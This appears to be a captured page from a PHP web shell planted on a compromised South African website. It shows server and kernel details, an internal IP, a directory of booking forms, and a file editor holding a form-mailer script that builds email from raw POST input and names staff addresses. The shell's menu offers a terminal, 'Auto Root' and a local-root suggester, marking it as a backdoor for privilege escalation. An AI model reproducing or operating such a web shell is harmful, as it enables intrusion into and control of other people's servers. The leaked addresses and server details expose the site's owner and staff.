Linux cesa-www-main 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
Apache/2.4.68 (Debian)
Server IP : 10.218.0.2 & Your IP : 216.73.216.28
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
cesa.co.za /
Directory2017 /
Delete
Unzip
Name
Size
Permission
Date
Action
SpryAssets
[ DIR ]
drwxr-sr-x
2017-02-01 08:31
images
[ DIR ]
drwxr-sr-x
2017-02-01 08:31
Booking_Form_Member.html
8.67
KB
-rw-r--r--
2017-02-01 08:31
Booking_Form_Non_Member.html
8.32
KB
-rw-r--r--
2017-02-01 08:31
Booking_Form_Thanks.html
1.59
KB
-rw-r--r--
2017-02-01 08:31
Email_Member.html
4.13
KB
-rw-r--r--
2017-02-01 08:31
Email_Non_Member.html
4.02
KB
-rw-r--r--
2017-02-01 08:31
Live_Email_Member.html
4.13
KB
-rw-r--r--
2017-02-01 08:31
Live_Email_Non_Member.html
4.02
KB
-rw-r--r--
2017-02-01 08:31
Live_Member.html
8.64
KB
-rw-r--r--
2017-02-01 08:31
Live_Non_Member.html
8.42
KB
-rw-r--r--
2017-02-01 09:05
process.php
1.13
KB
-rw-r--r--
2018-05-28 10:08
Save
Rename
<?php die(); require("../php/class.phpmailer.php"); function XMail($to, $subject, $msg, $from, $CC, $type) { $mail = new PHPMailer(); $mail->Mailer="mail"; if ($type=="html") $mail->IsHTML(true); $mail->From = $from; $mail->FromName = $from; $arrto = explode(",",$to); for ($i=0; $i<count($arrto); $i++) { $mail->AddAddress($arrto[$i]); } $mail->Subject=$subject; $mail->Body=$msg; if (!$mail->Send()) echo $mail->ErrorInfo; } $sMsg='<table width="700" border="1" cellpadding="2"> <tbody>'; foreach ($_POST as $key=>$value) { if (($key!="form_tools_form_id") && ($key!="Submit")) { $sMsg.='<tr> <td valign="top">'.str_replace("_"," ",$key).'</td> <td valign="top">'.$value.'</td> </tr>'; } } $sMsg.=' </tbody> </table> '; $subject="DoF Rate Card Booking - "; if ($_POST["form_tools_form_id"]==1) { $subject.="Member"; } elseif ($_POST["form_tools_form_id"]==2) { $subject.="Non-Member"; } XMail("bonolo@cesa.co.za,patriciaf@cesa.co.za,athromethm@cesa.co.za", $subject, $sMsg, $_POST["Email_Address"], "", "html"); header("Location: http://www.cesa.co.za/Directory2017/Booking_Form_Thanks.html"); ?>